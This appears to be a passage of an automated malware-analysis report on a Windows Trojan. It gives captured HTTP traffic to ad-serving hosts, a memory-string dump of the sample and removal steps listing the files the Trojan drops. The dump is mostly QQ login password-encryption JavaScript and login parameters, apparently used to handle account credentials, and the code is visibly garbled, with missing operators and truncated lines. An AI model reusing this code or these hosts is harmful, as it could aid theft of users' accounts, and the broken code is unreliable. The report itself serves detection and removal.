User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 15198
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/gjgg.htm
Last-Modified: Tue, 21 Jun 2016 02:14:19 GMT
Accept-Ranges: bytes
ETag: "8228749e62cbd11:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:42 GMT

GET /ad/mcgg456.htm HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: ad.7532.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 4406
Content-Type: text/html
Content-Location: hXXp://ad.7532.com/ad/mcgg456.htm
Last-Modified: Wed, 02 Mar 2016 05:01:52 GMT
Accept-Ranges: bytes
ETag: "a8b4a0a24074d11:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:44 GMT

The Trojan connects to the servers at the following location(s):

%original file name%.exe_3404:

function T(){d(new Date().getTime())}
if(U==null){U=new Array();ac=0;var I;if(navigator.appName=='Netscape'&&navigator.appVersion<'5'&&window.crypto&&window.crypto.random){var F=window.crypto.random(32);for(I=0;I<F.length;  I){U[ac  ]=F.charCodeAt(I)&255}}
while(ac<M){I=Math.floor(65536*Math.random());U[ac  ]=I>>>8;U[ac  ]=I&255}
function C(){if(m==null){T();m=ao();m.init(U);for(ac=0;ac<U.length;  ac){U[ac]=0}
return m.next()}
function av(z){var t;for(t=0;t<z.length;  t){z[t]=C()}}
ad.prototype.nextBytes=av;function k(){this.i=0;this.j=0;this.S=new Array()}
z=0;for(aB=0;aB<256;  aB){z=(z this.S[aB] aC[aB¬.length])&255;aA=this.S[aB];this.S[aB]=this.S[z];this.S[z]=aA}
k.prototype.init=e;k.prototype.next=a;function ao(){return new k()}
var M=256;function S(aB,aA,z){aA='F20CE00BAE5361F8FA3AE9CEFA495362FF7DA1BA628F64A347F0A8C012BF0B254A30CD92ABFFE7A6EE0DC424CB6166F8819EFA5BCCB20EDFB4AD02E412CCF579B1CA711D55B8B0B3AEB60153D5E0693A2A86F3167D7847A0CB8B00004716A9095D9BADC977CBB804DBDCBA6029A9710869A453F27DFDDF83C016D928B3CBF4C7';z='3';var t=new L();t.setPublic(aA,z);return t.encrypt(aB)}
return{rsa_encrypt:S}}();var r=window||{};(function(r){var s='',a=0,g=[],x=[],y=0,u=0,m=[],t=[],n=true;function e(){return Math.round(Math.random()*4294967295)}
var z='';for(var A=0;A<C.length;A  ){var B=Number(C[A]).toString(16);if(B.length==1){B='0' B}
function v(A){var B='';for(var z=0;z<A.length;z =2){B =String.fromCharCode(parseInt(A.substr(z,2),16))}
var B=[];for(var A=0;A<C.length;A  ){B[A]=C.charCodeAt(A)}
function k(C){var B,D,A=[],z=C.length;for(B=0;B<z;B  ){D=C.charCodeAt(B);if(D>0&&D<=127){A.push(C.charAt(B))}else{if(D>=128&&D<=2047){A.push(String.fromCharCode(192|((D>>6)&31)),String.fromCharCode(128|(D&63)))}else{if(D>=2048&&D<=65535){A.push(String.fromCharCode(224|((D>>12)&15)),String.fromCharCode(128|((D>>6)&63)),String.fromCharCode(128|(D&63)))}}}}
return A.join('')}
function h(B){g=new Array(8);x=new Array(8);y=u=0;n=true;a=0;var z=B.length;var C=0;a=(z 10)%8;if(a!=0){a=8-a}
function q(D){var C=0;var A=new Array(8);var z=D.length;t=D;if(z%8!=0||z<16){return null}
for(var B=0;B<A.length;B  ){A[B]=0}
function f(){var z=t.length;for(var A=0;A<8;A  ){x[A]^=t[y A]}
function o(D,C){var B=[];if(C){for(var A=0;A<D.length;A  ){B[A]=D.charCodeAt(A)&255}}else{var z=0;for(var A=0;A<D.length;A =2){B[z  ]=parseInt(D.substr(A,2),16)}}
r.TEA={encrypt:function(C,B){var A=o(C,B);var z=h(A);return w(z)},enAsBase64:function(E,D){var C=o(E,D);var B=h(C);var z='';for(var A=0;A<B.length;A  ){z =String.fromCharCode(B[A])}
return d.encode(z)},decrypt:function(B){var A=o(B,false);var z=q(A);return w(z)},initkey:function(z,A){s=o(z,A)},bytesToStr:v,strToBytes:c,bytesInStr:w,dataFromStr:o};var d={};d.PADCHAR='=';d.ALPHA='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';d.getbyte=function(B,A){var z=B.charCodeAt(A);if(z>255){throw'INVALID_CHARACTER_ERR: DOM Exception 5'}
return z};d.encode=function(D){if(arguments.length!=1){throw'SyntaxError: Not enough arguments'}
var A=d.PADCHAR;var F=d.ALPHA;var E=d.getbyte;var C,G;var z=[];D='' D;var B=D.length-D.length%3;if(D.length==0){return D}
for(C=0;C<B;C =3){G=(E(D,C)<<16)|(E(D,C 1)<<8)|E(D,C 2);z.push(F.charAt(G>>18));z.push(F.charAt((G>>12)&63));z.push(F.charAt((G>>6)&63));z.push(F.charAt(G&63))}
switch(D.length-B){case 1:G=E(D,C)<<16;z.push(F.charAt(G>>18) F.charAt((G>>12)&63) A A);break;case 2:G=(E(D,C)<<16)|(E(D,C 1)<<8);z.push(F.charAt(G>>18) F.charAt((G>>12)&63) F.charAt((G>>6)&63) A);break}
return z.join('')};if(!window.btoa){window.btoa=d.encode}})(window);var hexcase=1;var b64pad='';var chrsz=8;var mode=32;function md5(s){return hex_md5(s)}
function hex_md5(s){return binl2hex(core_md5(str2binl(s),s.length*chrsz))}
function str_md5(s){return binl2str(core_md5(str2binl(s),s.length*chrsz))}
function hex_hmac_md5(key,data){return binl2hex(core_hmac_md5(key,data))}
function b64_hmac_md5(key,data){return binl2b64(core_hmac_md5(key,data))}
function str_hmac_md5(key,data){return binl2str(core_hmac_md5(key,data))}
function core_md5(x,len){x[len>>5]|=128<<((len)2);x[(((len 64)>>>9)<<4) 14]=len;var a=1732584193;var b=-271733879;var c=-1732584194;var d=271733878;for(var i=0;i<x.length;i =16){var olda=a;var oldb=b;var oldc=c;var oldd=d;a=md5_ff(a,b,c,d,x[i 0],7,-680876936);d=md5_ff(d,a,b,c,x[i 1],12,-389564586);c=md5_ff(c,d,a,b,x[i 2],17,606105819);b=md5_ff(b,c,d,a,x[i 3],22,-1044525330);a=md5_ff(a,b,c,d,x[i 4],7,-176418897);d=md5_ff(d,a,b,c,x[i 5],12,1200080426);c=md5_ff(c,d,a,b,x[i 6],17,-1473231341);b=md5_ff(b,c,d,a,x[i 7],22,-45705983);a=md5_ff(a,b,c,d,x[i 8],7,1770035416);d=md5_ff(d,a,b,c,x[i 9],12,-1958414417);c=md5_ff(c,d,a,b,x[i 10],17,-42063);b=md5_ff(b,c,d,a,x[i 11],22,-1990404162);a=md5_ff(a,b,c,d,x[i 12],7,1804603682);d=md5_ff(d,a,b,c,x[i 13],12,-40341101);c=md5_ff(c,d,a,b,x[i 14],17,-1502002290);b=md5_ff(b,c,d,a,x[i 15],22,1236535329);a=md5_gg(a,b,c,d,x[i 1],5,-165796510);d=md5_gg(d,a,b,c,x[i 6],9,-1069501632);c=md5_gg(c,d,a,b,x[i 11],14,643717713);b=md5_gg(b,c,d,a,x[i 0],20,-373897302);a=md5_gg(a,b,c,d,x[i 5],5,-701558691);d=md5_gg(d,a,b,c,x[i 10],9,38016083);c=md5_gg(c,d,a,b,x[i 15],14,-660478335);b=md5_gg(b,c,d,a,x[i 4],20,-405537848);a=md5_gg(a,b,c,d,x[i 9],5,568446438);d=md5_gg(d,a,b,c,x[i 14],9,-1019803690);c=md5_gg(c,d,a,b,x[i 3],14,-187363961);b=md5_gg(b,c,d,a,x[i 8],20,1163531501);a=md5_gg(a,b,c,d,x[i 13],5,-1444681467);d=md5_gg(d,a,b,c,x[i 2],9,-51403784);c=md5_gg(c,d,a,b,x[i 7],14,1735328473);b=md5_gg(b,c,d,a,x[i 12],20,-1926607734);a=md5_hh(a,b,c,d,x[i 5],4,-378558);d=md5_hh(d,a,b,c,x[i 8],11,-2022574463);c=md5_hh(c,d,a,b,x[i 11],16,1839030562);b=md5_hh(b,c,d,a,x[i 14],23,-35309556);a=md5_hh(a,b,c,d,x[i 1],4,-1530992060);d=md5_hh(d,a,b,c,x[i 4],11,1272893353);c=md5_hh(c,d,a,b,x[i 7],16,-155497632);b=md5_hh(b,c,d,a,x[i 10],23,-1094730640);a=md5_hh(a,b,c,d,x[i 13],4,681279174);d=md5_hh(d,a,b,c,x[i 0],11,-358537222);c=md5_hh(c,d,a,b,x[i 3],16,-722521979);b=md5_hh(b,c,d,a,x[i 6],23,76029189);a=md5_hh(a,b,c,d,x[i 9],4,-640364487);d=md5_hh(d,a,b,c,x[i 
12],11,-421815835);c=md5_hh(c,d,a,b,x[i 15],16,530742520);b=md5_hh(b,c,d,a,x[i 2],23,-995338651);a=md5_ii(a,b,c,d,x[i 0],6,-198630844);d=md5_ii(d,a,b,c,x[i 7],10,1126891415);c=md5_ii(c,d,a,b,x[i 14],15,-1416354905);b=md5_ii(b,c,d,a,x[i 5],21,-57434055);a=md5_ii(a,b,c,d,x[i 12],6,1700485571);d=md5_ii(d,a,b,c,x[i 3],10,-1894986606);c=md5_ii(c,d,a,b,x[i 10],15,-1051523);b=md5_ii(b,c,d,a,x[i 1],21,-2054922799);a=md5_ii(a,b,c,d,x[i 8],6,1873313359);d=md5_ii(d,a,b,c,x[i 15],10,-30611744);c=md5_ii(c,d,a,b,x[i 6],15,-1560198380);b=md5_ii(b,c,d,a,x[i 13],21,1309151649);a=md5_ii(a,b,c,d,x[i 4],6,-145523070);d=md5_ii(d,a,b,c,x[i 11],10,-1120210379);c=md5_ii(c,d,a,b,x[i 2],15,718787259);b=md5_ii(b,c,d,a,x[i 9],21,-343485551);a=safe_add(a,olda);b=safe_add(b,oldb);c=safe_add(c,oldc);d=safe_add(d,oldd)}
function core_hmac_md5(key,data){var bkey=str2binl(key);if(bkey.length>16){bkey=core_md5(bkey,key.length*chrsz)}
var ipad=Array(16),opad=Array(16);for(var i=0;i<16;i  ){ipad[i]=bkey[i]^909522486;opad[i]=bkey[i]^1549556828}
var hash=core_md5(ipad.concat(str2binl(data)),512 data.length*chrsz);return core_md5(opad.concat(hash),512 128)}
function str2binl(str){var bin=Array();var mask=(1<<chrsz)-1;for(var i=0;i<str.length*chrsz;i =chrsz){bin[i>>5]|=(str.charCodeAt(i/chrsz)&mask)<<(i2)}
function binl2str(bin){var str='';var mask=(1<<chrsz)-1;for(var i=0;i<bin.length*32;i =chrsz){str =String.fromCharCode((bin[i>>5]>>>(i2))&mask)}
function binl2hex(binarray){var hex_tab=hexcase?'0123456789ABCDEF':'0123456789abcdef';var str='';for(var i=0;i<binarray.length*4;i  ){str =hex_tab.charAt((binarray[i>>2]>>((i%4)*8 4))&15) hex_tab.charAt((binarray[i>>2]>>((i%4)*8))&15)}
function binl2b64(binarray){var tab='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';var str='';for(var i=0;i<binarray.length*4;i =3){var triplet=(((binarray[i>>2]>>8*(i%4))&255)<<16)|(((binarray[i 1>>2]>>8*((i 1)%4))&255)<<8)|((binarray[i 2>>2]>>8*((i 2)%4))&255);for(var j=0;j<4;j  ){if(i*8 j*6>binarray.length*32){str =b64pad}else{str =tab.charAt((triplet>>6*(3-j))&63)}}}
function hexchar2bin(str){var arr=[];for(var i=0;i<str.length;i=i 2){arr.push('\\x' str.substr(i,2))}
arr=arr.join('');eval('var temp = \'' arr '\'');return temp}
function __monitor(mid,probability){if(Math.random()>(probability||1)){return}
try{var url=location.protocol '//ui.ptlogin2.qq.com/cgi-bin/report?id=' mid;var s=document.createElement('img');s.src=url}catch(e){}}
function getEncryption(password,salt,vcode){salt=uin2hex(salt);vcode=vcode||'';password=password||'';var md5Pwd=md5(password),h1=hexchar2bin(md5Pwd),s2=md5(h1 salt),rsaH1=$pt.RSA.rsa_encrypt(h1),rsaH1Len=(rsaH1.length/2).toString(16),hexVcode=r.TEA.strToBytes(vcode.toUpperCase(),true),vcodeLen=Number(hexVcode.length/2).toString(16);while(vcodeLen.length<4){vcodeLen='0' vcodeLen}
while(rsaH1Len.length<4){rsaH1Len='0' rsaH1Len}
r.TEA.initkey(s2);var saltPwd=r.TEA.enAsBase64(rsaH1Len rsaH1 r.TEA.strToBytes(salt) vcodeLen hexVcode);r.TEA.initkey('');return saltPwd.replace(/[\/\ =]/g,function(a){return{'/':'-',' ':'*','=':'_'}[a]})}
function uin2hex(str){var maxLength=16;var hex=parseInt(str).toString(16);var len=hex.length;for(var i=len;i<maxLength;i  ){hex="0" hex}
var arr=[];for(var j=0;j<maxLength;j =2){arr.push("\\x" hex.substr(j,2))}
var result=arr.join("");eval('result="' result '"');return result}getEncryption
&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=21-43-1443602837456&js_ver=10135&js_type=1&login_sig=bX2vEC1My7mgtm3kIVH0UY57UQiklmQQaaq2BdbCVtd39fDjGGywlyInOnozDIje&pt_uistyle=32&aid=549000912&daid=5&pt_qzone_sig=1&
&js_ver=10135&js_type=1&login_sig=&pt_uistyle=32&aid=549000912&daid=5&pt_qzone_sig=1&
&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=5-23-
function time(){return Math.random()}

%original file name%.exe_3404_rwx_10001000_00039000:



Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G8CYUMX5.txt (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXGBCMD7.txt (99 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\gjgg[1].htm (3748 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8ZW2X1AZ.txt (77 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\4473463[1].js (25 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ssxs11[1].htm (825 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ssxszgg1[1].htm (1380 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\19059730[1].js (25 bytes)
    C:\dc.dll (122 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ssxs13[1].htm (508 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ssxs12[1].htm (1283 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017032220170323\index.dat (16 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ssxsz[1].htm (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\2KZT5IAY.txt (76 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\mcgg456[1].htm (1461 bytes)
    C:\SkinH_EL.dll (178 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\mcgg[1].htm (75 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GZOJPSMC.txt (233 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ssggd[1].htm (106 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
